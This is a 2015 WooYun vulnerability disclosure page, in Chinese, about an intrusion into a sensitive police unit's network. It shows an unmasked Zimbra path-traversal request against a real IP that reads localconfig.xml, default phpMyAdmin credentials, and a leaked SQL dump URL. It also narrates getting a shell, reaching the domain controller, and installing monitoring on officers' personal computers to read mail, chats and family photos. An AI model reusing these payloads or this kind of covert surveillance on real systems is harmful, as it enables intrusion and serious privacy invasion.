当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124999

漏洞标题:某敏感单位安全之如何控制内部信息通信网(从全网到个人机通讯信息含家庭)

相关厂商:某敏感部门

漏洞作者: 淡漠天空

提交时间:2015-07-07 10:27

修复时间:2015-08-21 11:22

公开时间:2015-08-21 11:22

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-07: 细节已通知厂商并且等待厂商处理中
2015-07-07: 厂商已经确认,细节仅向厂商公开
2015-07-17: 细节向核心白帽子及相关领域专家公开
2015-07-27: 细节向普通白帽子公开
2015-08-06: 细节向实习白帽子公开
2015-08-21: 细节向公众公开

简要描述:

听实习同行肉肉说最近乌云要开会了
喝个血瓶复活一下HP
顺路广告:招核安全工程师
要求熟悉洲际弹道导弹/反导系统/核动力装置数据参数 私人team

详细说明:

mask 区域
*****sk*****
1.http://**.**.**/admin.phpc=db&m=sql_
*****in *****
*****^然改了^*****
*****^^什^*****
**********
2.http://**.**.**/phpmyadmin/ root/123_
3.http://**.**.**/phpmyadmin/ root/123_
**********
*****^^*****
4.http://**.**.**//member/index.php0.878158365841955&c=api&height[]=32&m=captcha&width=90


正题:finecms_高级版getshell直接神器本地内网
内网分为office-办公网/rmgab-服务器区/GAB公安通信网
看看mail
http://114.255.159.82/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
没有什么卵用
http://html5.cpd.com.cn/yunxiu0506.sql
还是没有什么卵用
然而意外的发现了DNS域控制服务器,么么哒
那么一切就都解开了
既然有办公网和公安通信网?那么我们去看看警察大叔的个人机吧
清一色xp系统。。。。2333
从foxmail到家庭照片到qq到内部通讯一览无余
安装监控记录 每天就看警察大叔在个人机做什么。。。。感觉好无聊
这次不画思维导图了 麻烦 一切都在图里
</mask>

漏洞证明:

mask 区域
*****c71e952e9340dc48d5a4b0.jpg*****
*****2cd0a51b81303f70afdbc6.jpg*****
*****1ea008915f59de070c328d.jpg*****
*****fb6e3670b94835a36be32c.jpg*****
*****t; /><img src="/upload/201507/06222618567*****
*****0fe1721d9e326fa28716.jpg&qu*****
*****a55ec8b8e82f7e8546f87e.jpg*****
*****ece4bcf95cee9823671268.jpg*****
*****t; /><img src="/upload/201507/06222659c26*****
*****b7c07155241f723fe078f1.jpg*****
*****99c2721f905e7f28d40308.jpg*****
*****b0af70fe0f52eaa5124275.jpg*****
*****ae008d0cf612799381d107.jpg*****
*****f3a2c2d18c6d72d49083ac.jpg*****
*****15f8ac28cfac30d5f8a018.jpg*****

修复方案:

内网渗透重点在于如何如破边界和跨域问题
看起来并不是做的多好

版权声明:转载请注明来源 淡漠天空@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-07-07 11:21

厂商回复:

非常感谢!
会尽快修复。

最新状态:

暂无